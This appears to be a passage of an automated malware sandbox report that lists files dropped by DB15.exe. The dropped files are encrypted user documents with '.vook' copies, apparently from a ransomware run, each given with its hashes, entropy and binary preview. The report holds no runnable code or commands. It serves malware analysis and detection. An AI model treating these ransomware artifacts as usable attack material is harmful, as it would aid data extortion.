                                                                                                                                                                                                                                      Preview:SQRKHu;P..?R.-....7.8..f.....w..H.?..>...;.L....P...<Ma.~.b...Dx'.p..O.g.Wd9*vI.l..........b........c...G.....8k..l..}}.....~.v.x..3>..i.<.,.r^....;.w.DR.......;......rc..v.@....[[U....]..8...3....._..^."$I....BB....weZ.*&T.s....."..>T.>P....X.'.....^\.....=.I$z.M.H.m.$.Yix...Q..c9.4*.*...v..0<...[.S.7....<..x..>.6...v. .._.:p.Dqv.t..E.x.....H..}.%..d.*T.,.j..<..k,$r).`.y!..:n...5:.!&.Y.Z...}.Q.....`!..+]........:.y.R..AkG..~..J.|..*..F..~.E.R.=.....4......-t}h./.f....a..X.......s. ..1..Y.K.1..F2t.cMg.f.Zy.@..T.....6.a.H.1....,...x~...{S..2O..-.S...{...y?...<0.......!L|...y..:...j|..7.H..A..&....@.f4.\..d.u..'...o,...........F...+L.0%I.l...9.K..........!...U........>.......!...).....{..v.......m#.L..rj.M.T}...-Kv.U;.+..?P.e.B./..[.{...[43..p..s.w...gRd....$......uL ......z~...*..gl..T,..$..{....-..%%....o..S......$.gI............i.o....f....P..'....*-.j..X.L..... .....u.=.x^g.?BE..=0..0:.aV+._J....2.J..y.t..MrX?.,+......A.P..m..D..%m....#

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SQRKHNBNYN\UOOJJOZIRH.xlsx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.851332507391146
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:+eBc48QUvW6pEVY13lcCk3w4yPHJnTyCfBs6YZL9Ov/iGOnl/N6LU0riiTkbD:+uomY13WCsnyP55sJZLOamhiD
                                                                                                                                                                                                                                      MD5:8746C24E31F82604FF3358CF5D1B9862
                                                                                                                                                                                                                                      SHA1:7434B0E420E45CB52D2CE236741B9AA249193EA3
                                                                                                                                                                                                                                      SHA-256:4638049FA737085EC7112F2BF5820784AB2ACFF82E6FA3A0454E84603610A92F
                                                                                                                                                                                                                                      SHA-512:374FE79D6077CE5974DE70CFFC313CA7AD191C382D815E17AD7485197EF1899B924B4B80F74CFE1574F4DD5E064F8F5811B9F3AB9AB6063C949008291CA813BF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:UOOJJ(2Sd..*.Y...G.{.q.|.\P..=d(V]_n....?h....d..a....5@.)..:..a<........na.....$.PBh{I.....q.t.....*..T....0.d..+./...1;.z.i.k9......-......\.5...y.xIa>....d...I.&O.*.=L..V.#.."7....y93.+Z.....)..@.'z..G..*].y......E.R1.l-]...[1...`...i.~..K'f....#...."..S.'..A...r2...Zy.6...Y.|[..Np...{L..B%n.p"..@...R.h.M9.L.T.3.?y....i......a.T"..5j.eg..j+L.6.,_....E.....5.F.....8s@".)....L.t=F9..L].;)a.eig...T.T1m...p`../p.a.I............Q....Ph..3..HO.jl.g.A..Y."t./....;..K@...ECR..j.Q..B.......;4......b.B.........z.T}.I..U.=v^..."...j.|r..+20...U...".h.Cf.......GZ.....!8...JU..g>.a^V..)d.g..!..r..Ev.k....}:....9.S...o_.....f...K.+<b..eu..<..!....m..H..H.......mp.....OT .}w...VN.b'...,.Q...>.z.w.tm.....j..-q..#..b..).....~.\}..7.Z.6.`,..Dd..!......V.).rx...\.J.....3..jp.vv.P......H00s......!I.l..n..k.Z.j.p.[........Zd#a/+.l28u..V...Q.....4....gc&=W...V....|D...~0.j.....1^..P.7.E..>.......EC.....,.....k.. .K...k....F(...]r....w?.>k.).f.

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SQRKHNBNYN\UOOJJOZIRH.xlsx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.851332507391146
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:+eBc48QUvW6pEVY13lcCk3w4yPHJnTyCfBs6YZL9Ov/iGOnl/N6LU0riiTkbD:+uomY13WCsnyP55sJZLOamhiD
                                                                                                                                                                                                                                      MD5:8746C24E31F82604FF3358CF5D1B9862
                                                                                                                                                                                                                                      SHA1:7434B0E420E45CB52D2CE236741B9AA249193EA3
                                                                                                                                                                                                                                      SHA-256:4638049FA737085EC7112F2BF5820784AB2ACFF82E6FA3A0454E84603610A92F
                                                                                                                                                                                                                                      SHA-512:374FE79D6077CE5974DE70CFFC313CA7AD191C382D815E17AD7485197EF1899B924B4B80F74CFE1574F4DD5E064F8F5811B9F3AB9AB6063C949008291CA813BF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:UOOJJ(2Sd..*.Y...G.{.q.|.\P..=d(V]_n....?h....d..a....5@.)..:..a<........na.....$.PBh{I.....q.t.....*..T....0.d..+./...1;.z.i.k9......-......\.5...y.xIa>....d...I.&O.*.=L..V.#.."7....y93.+Z.....)..@.'z..G..*].y......E.R1.l-]...[1...`...i.~..K'f....#...."..S.'..A...r2...Zy.6...Y.|[..Np...{L..B%n.p"..@...R.h.M9.L.T.3.?y....i......a.T"..5j.eg..j+L.6.,_....E.....5.F.....8s@".)....L.t=F9..L].;)a.eig...T.T1m...p`../p.a.I............Q....Ph..3..HO.jl.g.A..Y."t./....;..K@...ECR..j.Q..B.......;4......b.B.........z.T}.I..U.=v^..."...j.|r..+20...U...".h.Cf.......GZ.....!8...JU..g>.a^V..)d.g..!..r..Ev.k....}:....9.S...o_.....f...K.+<b..eu..<..!....m..H..H.......mp.....OT .}w...VN.b'...,.Q...>.z.w.tm.....j..-q..#..b..).....~.\}..7.Z.6.`,..Dd..!......V.).rx...\.J.....3..jp.vv.P......H00s......!I.l..n..k.Z.j.p.[........Zd#a/+.l28u..V...Q.....4....gc&=W...V....|D...~0.j.....1^..P.7.E..>.......EC.....,.....k.. .K...k....F(...]r....w?.>k.).f.

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SQSJKEBWDT.jpg

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.851066513838296
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:JOvupIa8f1JbKqP9HAaH3+lynJmuD/Clj6UmJZTHliTkbD:y48f1JbKOAmulmJfD/g6zAiD
                                                                                                                                                                                                                                      MD5:5AB600AE0BFAD5CE97EBB7B779DA3979
                                                                                                                                                                                                                                      SHA1:E1E6224C096E6AB16D168F2AEA80E57FC114AAB6
                                                                                                                                                                                                                                      SHA-256:E2C1D9D5A594ADAB8AED5A6F64503D08106B8C636CFDAF237C6EE2B618ECB979
                                                                                                                                                                                                                                      SHA-512:FB4C389CE8BC6DFE0857DF621A1661276B78B723FE89B99E32E2CEEC5324742253B1414D98A3543C3FE0C3C86C919F1D7A1C403CF2F49DBEA7224A47633C19DD
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Preview:SQSJK.....q"X.>.9..f.v.....M0..u.....N.'.Y..|.u<...3.C..9......%....wS.B.)|5..`....F\.V..t.e=.....W....Z...H...P...S... u.9..q..!C..u.?....N..JO~X.b.$..&...*..E........:.....-EL.n..k..Sx..._.l..k#..jE&.~. ../.G,..(.w1.w..pS.1.L...T2.....I'@....lH:}.........q...D &3..H.X3...........].b.Wl ..[.q..7..\Cum.5.x.fsh..PDW}x..,.7d..K.n....*."..L%.7......91..J.3.;..J.........Z1...p..9EL.....6.......i..P....\Y...............w..W.X.......j.wL..T..x....-...>...m.>.8.iw...B.....+...m._U.:{x.....D.]..1.DibG.u..t.=L....0/..*8.....8.M@..."k......T5...M.5[.....`..9..H...(l..I....e.:".TD~..Z+.K......,..#..v.r9.f~......H..i^..W..B^.U......x..P%..<....).]Pr@.LP. f.n.O.e....X...c\H.M).a.....m..\Cb/Kgp4.{X..C.N..>......F../.D.v..w.*%...$.n..).L..y..|c.R]....a.B..5okcB.h.L.&.[dG.m.`.%Kt#T...V.iXM...Y.... 9...j...Mf.....9a=y...7q.......:.!.o.b...=.(N....R\.`:.H[...Fo`Os!....d...\T..;...<!.e...L.+>..M.:-Z.Y.....J1!...D..`.Oikl..{...i....!4.I.j...K.@"...

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SQSJKEBWDT.jpg.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.851066513838296
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:JOvupIa8f1JbKqP9HAaH3+lynJmuD/Clj6UmJZTHliTkbD:y48f1JbKOAmulmJfD/g6zAiD
                                                                                                                                                                                                                                      MD5:5AB600AE0BFAD5CE97EBB7B779DA3979
                                                                                                                                                                                                                                      SHA1:E1E6224C096E6AB16D168F2AEA80E57FC114AAB6
                                                                                                                                                                                                                                      SHA-256:E2C1D9D5A594ADAB8AED5A6F64503D08106B8C636CFDAF237C6EE2B618ECB979
                                                                                                                                                                                                                                      SHA-512:FB4C389CE8BC6DFE0857DF621A1661276B78B723FE89B99E32E2CEEC5324742253B1414D98A3543C3FE0C3C86C919F1D7A1C403CF2F49DBEA7224A47633C19DD
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQSJK.....q"X.>.9..f.v.....M0..u.....N.'.Y..|.u<...3.C..9......%....wS.B.)|5..`....F\.V..t.e=.....W....Z...H...P...S... u.9..q..!C..u.?....N..JO~X.b.$..&...*..E........:.....-EL.n..k..Sx..._.l..k#..jE&.~. ../.G,..(.w1.w..pS.1.L...T2.....I'@....lH:}.........q...D &3..H.X3...........].b.Wl ..[.q..7..\Cum.5.x.fsh..PDW}x..,.7d..K.n....*."..L%.7......91..J.3.;..J.........Z1...p..9EL.....6.......i..P....\Y...............w..W.X.......j.wL..T..x....-...>...m.>.8.iw...B.....+...m._U.:{x.....D.]..1.DibG.u..t.=L....0/..*8.....8.M@..."k......T5...M.5[.....`..9..H...(l..I....e.:".TD~..Z+.K......,..#..v.r9.f~......H..i^..W..B^.U......x..P%..<....).]Pr@.LP. f.n.O.e....X...c\H.M).a.....m..\Cb/Kgp4.{X..C.N..>......F../.D.v..w.*%...$.n..).L..y..|c.R]....a.B..5okcB.h.L.&.[dG.m.`.%Kt#T...V.iXM...Y.... 9...j...Mf.....9a=y...7q.......:.!.o.b...=.(N....R\.`:.H[...Fo`Os!....d...\T..;...<!.e...L.+>..M.:-Z.Y.....J1!...D..`.Oikl..{...i....!4.I.j...K.@"...

                                                                                                                                                                                                                                      C:\Users\user\Desktop\UOOJJOZIRH.docx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.831242088210905
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:1y8GAQOOqrQIJo8MV/bGF6GowjdUigfLXtxkAAzc9TvJhwiiTkbD:A8GAlrQIuhb+FJ+XyEYXiD
                                                                                                                                                                                                                                      MD5:2DFD20FFC6FD21011487EFE21830D01F
                                                                                                                                                                                                                                      SHA1:0C3B7EA8C0BE294270B8DE2255EE557529DBCB63
                                                                                                                                                                                                                                      SHA-256:F14D564060E9E45CAA664BB03B6B4B4FDDCFA57EF957BD66DE56D2B0778BDB5E
                                                                                                                                                                                                                                      SHA-512:1B6E477BD2DBEBFDEA7D57DF08C758A7A4A6D3868EEB3256671F36E21CA14A4F0614735419EE2BC3BD8178B0D22249C14927749639722045D97733A2C1F3584B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:UOOJJ{6.2.3.h(..K...F,..W.G. p.t.hy ..t .yQ.p.......4^....Q.[).O=..Kq.O]...'.n.Q3j....|$..A.b.....,UX)se.h..p....Z..>..qQ...J0.....J....S-v..U3.C...9...Ef9..I..v...u..t..e..m...+vu.{....Fo....d"[.Slf.h...j....7..^.?....8.f. ..&........l+.tx.t....j%....w......u..s.v..Kv...0NF.XNd....EQ..=..vf.h..o..B5*.....^{.ib.F.*D.....=....Pw....=e.Z..it8...h?.9.....D}..H...u$.,.&.;D...rTL]S-'5........7..F.|_..R#...i5..n..p[.T.....5.+.M6+..Z..K.-{..8l....L...@I....X.....N.]_...P..!z%.n...Qe..@.~j}hw#.xQ7.Q.cZ>.VnTM.]J....u.W.)....Ph....N...S....f.@.`jj[.........oN..`..57.d>_...7...>$GV..p-.T..@.l8.H(.i. .h.>].....S.%..B.Pt.h=.!.N....Ye5.R....h.#2.../..V.u6..........I*"..............c..\Ns.e....]...'...n<.%.$[Y)..~".TI{ .n3/.\7..cn`8.1.g.;_..._.............sV..4<..'.m.N.?o....EQ"...T.@.x"w. .L. C........._=KX..M./....:..R>7.l....-..:.. ...o.]T..|k......IS.300....../.Q.j.a.%rj..~.yy.e_...........[+L..#f.".Z....1..5.pP..FJ%.{...........b5.A/.ML...PI.....%.&.40..oh.

                                                                                                                                                                                                                                      C:\Users\user\Desktop\UOOJJOZIRH.docx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.831242088210905
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:1y8GAQOOqrQIJo8MV/bGF6GowjdUigfLXtxkAAzc9TvJhwiiTkbD:A8GAlrQIuhb+FJ+XyEYXiD
                                                                                                                                                                                                                                      MD5:2DFD20FFC6FD21011487EFE21830D01F
                                                                                                                                                                                                                                      SHA1:0C3B7EA8C0BE294270B8DE2255EE557529DBCB63
                                                                                                                                                                                                                                      SHA-256:F14D564060E9E45CAA664BB03B6B4B4FDDCFA57EF957BD66DE56D2B0778BDB5E
                                                                                                                                                                                                                                      SHA-512:1B6E477BD2DBEBFDEA7D57DF08C758A7A4A6D3868EEB3256671F36E21CA14A4F0614735419EE2BC3BD8178B0D22249C14927749639722045D97733A2C1F3584B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:UOOJJ{6.2.3.h(..K...F,..W.G. p.t.hy ..t .yQ.p.......4^....Q.[).O=..Kq.O]...'.n.Q3j....|$..A.b.....,UX)se.h..p....Z..>..qQ...J0.....J....S-v..U3.C...9...Ef9..I..v...u..t..e..m...+vu.{....Fo....d"[.Slf.h...j....7..^.?....8.f. ..&........l+.tx.t....j%....w......u..s.v..Kv...0NF.XNd....EQ..=..vf.h..o..B5*.....^{.ib.F.*D.....=....Pw....=e.Z..it8...h?.9.....D}..H...u$.,.&.;D...rTL]S-'5........7..F.|_..R#...i5..n..p[.T.....5.+.M6+..Z..K.-{..8l....L...@I....X.....N.]_...P..!z%.n...Qe..@.~j}hw#.xQ7.Q.cZ>.VnTM.]J....u.W.)....Ph....N...S....f.@.`jj[.........oN..`..57.d>_...7...>$GV..p-.T..@.l8.H(.i. .h.>].....S.%..B.Pt.h=.!.N....Ye5.R....h.#2.../..V.u6..........I*"..............c..\Ns.e....]...'...n<.%.$[Y)..~".TI{ .n3/.\7..cn`8.1.g.;_..._.............sV..4<..'.m.N.?o....EQ"...T.@.x"w. .L. C........._=KX..M./....:..R>7.l....-..:.. ...o.]T..|k......IS.300....../.Q.j.a.%rj..~.yy.e_...........[+L..#f.".Z....1..5.pP..FJ%.{...........b5.A/.ML...PI.....%.&.40..oh.

                                                                                                                                                                                                                                      C:\Users\user\Desktop\UOOJJOZIRH.xlsx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.8437731010980976
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:Ewjh7Msj247tsq9Sz6McaWPOusjL5hPzCtN1BaWigLzGi8eeyr2V6QyiaYM4SiTW:ESOMMG3sDGhCgvGi8eeyr2VKiaEiD
                                                                                                                                                                                                                                      MD5:43DBA404E5FC846DF47436361FA8D97A
                                                                                                                                                                                                                                      SHA1:FF2ACB109BD7BCB156200955118759C7CA64783D
                                                                                                                                                                                                                                      SHA-256:736528F88023DD9E593BEC34E8D0C33EE15F49B752FBDF2524A4D527843DC3BB
                                                                                                                                                                                                                                      SHA-512:9538BE7BE89B8FB7EE4569052193E3E954AE1630D69B84AE6DEE963819C1F039A6BA7FF8E2704C0F916D510B0CFFDC37FAC447756E55190442400404C2492684
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:UOOJJ..r76..br.8:.C#R.%.N.i...&lA..#.....%.F.....k..%.~R.Ez....A.8....37.y../Sp$..>...S..X.C.N.X*'.....!....Cma0.Y.......x...XH..Y...k..tt.......w..?....0Y..C.D.......^-.h.....m..8...g...)..r.3...-..j.a.%........_...5u+.sW?......r.:h........^.$i.W$N.{.34M...Gh...u$....?..h.AS..G..._M..PWGG...'$.$.J.z$.5..C..u.V.....m.sKZw..M.r\....Z.....p.........aJo...6IO..)..... .....P..rs.Z...... ..L.k.;LF-&.3.....SF^..|J......83.....Y.g.1.4\.L..]..+.V+..)....].......... ^..7Vb7D...4..*........E...$...W...Z...y$......'K.....E....%...L.].....1....U:..9.29.Wy.@...~........^...gs.w.Ad..|.9.O...M..c..?c.......c=.,......H@x.Q.a.C.^k.......&^AC..,6....A.s.Vs#bL.5....R..Q..h.O........$...1.9..~..(T...?K..#V.."...r........,.8U,.h.(.C..V.....w.....Y...o..d.d....u.d..6w`....|.RX........l.....Sc.AB..0H.n.WQ.......=.....A.....z.7XG..TB.)N...]$....$..Vqj%D...fOO..G..x..j..y..i...cF....j.)$).0).....uHm..[f.........w.?.K..M....9$BBz...1....>^.kh..{......vh..N...

                                                                                                                                                                                                                                      C:\Users\user\Desktop\UOOJJOZIRH.xlsx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.8437731010980976
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:Ewjh7Msj247tsq9Sz6McaWPOusjL5hPzCtN1BaWigLzGi8eeyr2V6QyiaYM4SiTW:ESOMMG3sDGhCgvGi8eeyr2VKiaEiD
                                                                                                                                                                                                                                      MD5:43DBA404E5FC846DF47436361FA8D97A
                                                                                                                                                                                                                                      SHA1:FF2ACB109BD7BCB156200955118759C7CA64783D
                                                                                                                                                                                                                                      SHA-256:736528F88023DD9E593BEC34E8D0C33EE15F49B752FBDF2524A4D527843DC3BB
                                                                                                                                                                                                                                      SHA-512:9538BE7BE89B8FB7EE4569052193E3E954AE1630D69B84AE6DEE963819C1F039A6BA7FF8E2704C0F916D510B0CFFDC37FAC447756E55190442400404C2492684
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:UOOJJ..r76..br.8:.C#R.%.N.i...&lA..#.....%.F.....k..%.~R.Ez....A.8....37.y../Sp$..>...S..X.C.N.X*'.....!....Cma0.Y.......x...XH..Y...k..tt.......w..?....0Y..C.D.......^-.h.....m..8...g...)..r.3...-..j.a.%........_...5u+.sW?......r.:h........^.$i.W$N.{.34M...Gh...u$....?..h.AS..G..._M..PWGG...'$.$.J.z$.5..C..u.V.....m.sKZw..M.r\....Z.....p.........aJo...6IO..)..... .....P..rs.Z...... ..L.k.;LF-&.3.....SF^..|J......83.....Y.g.1.4\.L..]..+.V+..)....].......... ^..7Vb7D...4..*........E...$...W...Z...y$......'K.....E....%...L.].....1....U:..9.29.Wy.@...~........^...gs.w.Ad..|.9.O...M..c..?c.......c=.,......H@x.Q.a.C.^k.......&^AC..,6....A.s.Vs#bL.5....R..Q..h.O........$...1.9..~..(T...?K..#V.."...r........,.8U,.h.(.C..V.....w.....Y...o..d.d....u.d..6w`....|.RX........l.....Sc.AB..0H.n.WQ.......=.....A.....z.7XG..TB.)N...]$....$..Vqj%D...fOO..G..x..j..y..i...cF....j.)$).0).....uHm..[f.........w.?.K..M....9$BBz...1....>^.kh..{......vh..N...

                                                                                                                                                                                                                                      C:\Users\user\Desktop\UOOJJOZIRH\NEBFQQYWPS.pdf

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.840145253849665
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:Nw7BueC1UtMXmkVuKcEUv4H2We8USWHYBNSdLPosWsVmMkGdM/ciTkbD:lHXmUuNEUwHMPYBcFPmsVm4dM/ViD
                                                                                                                                                                                                                                      MD5:C703EA3E4958FD517A348B253622EBCF
                                                                                                                                                                                                                                      SHA1:11FD07FE5475B04E4E350D38BB8284B746906DCD
                                                                                                                                                                                                                                      SHA-256:0B13E5BD84CEB7A78ED58F695C66BE0EDF8B7727498B0697DA5E6D292939D422
                                                                                                                                                                                                                                      SHA-512:CB904C828997A50E492A57F1FDD6081280F9FC704AEBBF660C4D83F9A17B668D7DBD016E47066053BCFF9C33E5D61812FB9CCEEB059308B3D8D0C34F3A239342
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQ......u..4..)..8Z(....H.2/..I..d,..>.%.^.m..}......y..WH_...B$i.sV.W....+2|.V.C...s..?.....~.n...b&`........3.......5.4.e.....\.M.Sq...$....r.R.fp.d....dz...?...B....k..w..I.-.$x.LY.....}.......+.....L....&..b.l.w.*..y.+.P...S.S.(.......B(nAK~.1..s...lKF...p.R.....<.....J....'S0.(.....3...3..I.7..b5..].....3Y..V...!j.'^k.W}P;<....V+rk..qh.+"!.;@.(.S'.......X2V.>.0`.. .".iD.MDt[.::{...A.y.5...d..DXp...7.....d.._%I..../...t.P=..C ..2.....s.N1.'u(e=]A}.a]..5._.r......:.....:qQ.......Q......"...f.....Zn....Z.W....@J.....4p...0..C@..#.-O...I...kzC,*......9W).;...q1..BA.......a..(.Q..'E.em........f@.(S.w_P.z.a1...|L!......R...}>...<.........c.Qb.*..'..M(.z?......]X....Y..`3...h.t.Ryp...^...I.H...4..]......;........@>@}.;.+.2-V..q.I.#!..&A.&....1.'F.......Am[U......':=,...nk#...A....^..o......:.>..tT....{.,.G.I...a..O...C..W{q.((!.[.r'.".Qm..6..k.p.(.,.a.?/N.DR.W.......D...(..".....S..Q'Zq.P.9.8...mD.s..B......O+..0......x..SsN#....K.b.

                                                                                                                                                                                                                                      C:\Users\user\Desktop\UOOJJOZIRH\NEBFQQYWPS.pdf.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.840145253849665
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:Nw7BueC1UtMXmkVuKcEUv4H2We8USWHYBNSdLPosWsVmMkGdM/ciTkbD:lHXmUuNEUwHMPYBcFPmsVm4dM/ViD
                                                                                                                                                                                                                                      MD5:C703EA3E4958FD517A348B253622EBCF
                                                                                                                                                                                                                                      SHA1:11FD07FE5475B04E4E350D38BB8284B746906DCD
                                                                                                                                                                                                                                      SHA-256:0B13E5BD84CEB7A78ED58F695C66BE0EDF8B7727498B0697DA5E6D292939D422
                                                                                                                                                                                                                                      SHA-512:CB904C828997A50E492A57F1FDD6081280F9FC704AEBBF660C4D83F9A17B668D7DBD016E47066053BCFF9C33E5D61812FB9CCEEB059308B3D8D0C34F3A239342
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQ......u..4..)..8Z(....H.2/..I..d,..>.%.^.m..}......y..WH_...B$i.sV.W....+2|.V.C...s..?.....~.n...b&`........3.......5.4.e.....\.M.Sq...$....r.R.fp.d....dz...?...B....k..w..I.-.$x.LY.....}.......+.....L....&..b.l.w.*..y.+.P...S.S.(.......B(nAK~.1..s...lKF...p.R.....<.....J....'S0.(.....3...3..I.7..b5..].....3Y..V...!j.'^k.W}P;<....V+rk..qh.+"!.;@.(.S'.......X2V.>.0`.. .".iD.MDt[.::{...A.y.5...d..DXp...7.....d.._%I..../...t.P=..C ..2.....s.N1.'u(e=]A}.a]..5._.r......:.....:qQ.......Q......"...f.....Zn....Z.W....@J.....4p...0..C@..#.-O...I...kzC,*......9W).;...q1..BA.......a..(.Q..'E.em........f@.(S.w_P.z.a1...|L!......R...}>...<.........c.Qb.*..'..M(.z?......]X....Y..`3...h.t.Ryp...^...I.H...4..]......;........@>@}.;.+.2-V..q.I.#!..&A.&....1.'F.......Am[U......':=,...nk#...A....^..o......:.>..tT....{.,.G.I...a..O...C..W{q.((!.[.r'.".Qm..6..k.p.(.,.a.?/N.DR.W.......D...(..".....S..Q'Zq.P.9.8...mD.s..B......O+..0......x..SsN#....K.b.

                                                                                                                                                                                                                                      C:\Users\user\Desktop\UOOJJOZIRH\PWCCAWLGRE.mp3

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.837225024756315
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:1NjmnmzWCGOhN2VGEW3WI98/SkJZo6WN6ez11FiNMfwXeIiTkbD:X91GnB3NfAN6+1iifdZiD
                                                                                                                                                                                                                                      MD5:BB6061F99DC401B925FFCD96D3CD0FD6
                                                                                                                                                                                                                                      SHA1:CF3AA4A09A5E6720BBDB97BFDA94F7435FB6C50A
                                                                                                                                                                                                                                      SHA-256:9790FD84567B7CCE07A7A12FF8884DAD26168C7A0FCCCA8B0D0FB2B195D1ED38
                                                                                                                                                                                                                                      SHA-512:4F12E0426FC5A65BF75E1B6E62F578B2F52AA96C886BA7D72E52DF36DD929F0B3B7AB96C1748F4F7476D170BE54E025580D8D3B43E2A52FB7FFCBB4B7534DA08
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCA.{$-_.b.......bT..75...~y.zST.?e.d..h~3Y.[w...^*..xE..x...p..|....|..CK..2..8.;.2kk..Y"#..F.6..k.?.NX#Q.8m....n.3T~.h..^2jR.."....>U...p.-D@M.{...z.......z?....$..H.".....Q:.b:x.('.zV.+.40...<.;.<N..j0p..d..jh..s....F..&.A9.>I..Rf...+S..P,...R._..'.J%.a....:._Fp...u..........p..%...^..f../.y~.b&b.O...x.\...L.8.../ `4...;..L.=.............%.-.D.4.\..k47..I..H,.7.G.e$...y..%..88..U`......G..+.E.-'.B.......<I..._.oFK.O..o.>..!H.PZbv..(..e...5..E1...4d...n7.p...R=....(.iM%..5..z....5o..<>$..J......d)+.\dD...h8J.6.@:>...%.VM>......c.4,".B.....F.2.%..........v.3A..Y)..X..'..-..=G.....?..Y....../.......u....6.......e.H...A.*.....d...3.s..*:..O...T..6;..e...4........}... .9...9|..h...-...k.. ;.G.bG...y(.:".p.j..K.#..7...~2P...yb...Cq..!\.e;}|..*.....5..r..;......2..T.."....U..."g.BK.h...x,d..4...f..W!..N.gN..)B_.{!..Tf...p...EF...o.W..c.N...$.../.6.?.........$=T..eyY.....|...^..H.....`&....x.._...#..b.{..Sc....k.q+........G........u

                                                                                                                                                                                                                                      C:\Users\user\Desktop\UOOJJOZIRH\PWCCAWLGRE.mp3.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
